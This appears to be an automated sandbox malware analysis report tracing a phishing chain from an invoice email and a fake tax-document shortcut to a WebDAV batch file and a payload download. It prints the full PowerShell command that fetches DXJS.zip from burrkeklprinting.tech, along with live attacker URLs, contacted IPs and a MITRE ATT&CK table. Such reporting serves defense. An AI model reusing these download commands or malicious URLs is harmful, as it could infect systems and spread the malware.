                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep count: 8332 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep count: 1567 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\OpenWith.exe TID: 2760Thread sleep count: 74 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132Thread sleep count: 2420 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132Thread sleep count: 7331 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5096Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"
                Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\E_TAX_DOC438093562789873345672_pdf.download"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DestinationPath 'C:\Users\user\Downloads' -Force }"
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Opens network shares
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat
                Source: C:\Windows\System32\cmd.exeFile opened: \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts2
                PowerShell                		1
                Browser Extensions                		11
                Process Injection                		11
                Masquerading                		OS Credential Dumping1
                Network Share Discovery                		Remote ServicesData from Local System2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scripting                		1
                Registry Run Keys / Startup Folder                		31
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media11
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		11
                Process Injection                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive4
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                DLL Side-Loading                		Login Hook1
                Rundll32                		NTDS31
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture4
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Application Window Discovery                		SSHKeylogging5
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\Downloads\Python\Launcher\py.exe0%ReversingLabs
                C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dll0%ReversingLabs
                C:\Users\user\Downloads\Python\Launcher\pyw.exe0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_testcapi.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_testclinic.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_testconsole.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_testimportmultiple.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_testinternalcapi.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_testmultiphase.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_testsinglephase.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_tkinter.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_uuid.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_wmi.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\_zoneinfo.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\libcrypto-3.dll0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\libffi-8.dll0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\libssl-3.dll0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\pyexpat.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\select.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\sqlite3.dll0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\tcl86t.dll0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\tk86t.dll0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\unicodedata.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\winsound.pyd0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\DLLs\zlib1.dll0%ReversingLabs
                C:\Users\user\Downloads\Python\Python312\Doc\html\_downloads\6dc1f3f4f0e6ca13cb42ddf4d6cbc8af\tzinfo_examples.py0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                bg.microsoft.map.fastly.net0%VirustotalBrowse
                www.google.com0%VirustotalBrowse
                string-neural-inspiration-polo.trycloudflare.com4%VirustotalBrowse
                burrkeklprinting.tech2%VirustotalBrowse
                github.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/2SB9MLRC/Rechnung%20Nr.%2017735360.html0%Avira URL Cloudsafe
                http://burrkeklprinting.tech:7119/DXJS.zip0%Avira URL Cloudsafe
                http://burrkeklprinting.tech:4098/:dir_browser/script.js0%Avira URL Cloudsafe
                http://burrkeklprinting.tech:4098/:dir_browser/logo.png0%Avira URL Cloudsafe
                http://burrkeklprinting.tech:4098/:dir_browser/style.css0%Avira URL Cloudsafe
                http://burrkeklprinting.tech:4098/favicon.ico0%Avira URL Cloudsafe
                http://burrkeklprinting.tech:4098/:dir_browser/favicon.ico0%Avira URL Cloudsafe
                http://burrkeklprinting.tech:4098/E_TAX_DOC/E_TAX_DOC438093562789873345672_pdf.lnk0%Avira URL Cloudsafe
                file:///C:/Users/user/Downloads/downloaded.pdf0%Avira URL Cloudsafe
                http://burrkeklprinting.tech:4098/FTSP.zip0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                string-neural-inspiration-polo.trycloudflare.com
                		104.16.231.132
                		truetrueunknown
                bg.microsoft.map.fastly.net
                		199.232.214.172
                		truefalseunknown
                chrome.cloudflare-dns.com
                		162.159.61.3
                		truefalse
                  		unknown
                  burrkeklprinting.tech
                  		116.203.169.52
                  		truetrueunknown
                  github.com
                  		140.82.121.3
                  		truefalseunknown
                  www.google.com
                  		142.250.185.228
                  		truefalseunknown
                  _4098._https.burrkeklprinting.tech
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    file:///C:/Users/user/Downloads/downloaded.pdffalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://burrkeklprinting.tech:4098/:dir_browser/style.csstrue
                    • Avira URL Cloud: safe
                    		unknown
                    file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/2SB9MLRC/Rechnung%20Nr.%2017735360.htmlfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://burrkeklprinting.tech:4098/:dir_browser/logo.pngtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://burrkeklprinting.tech:7119/DXJS.ziptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://burrkeklprinting.tech:4098/new.batfalse
                      		unknown
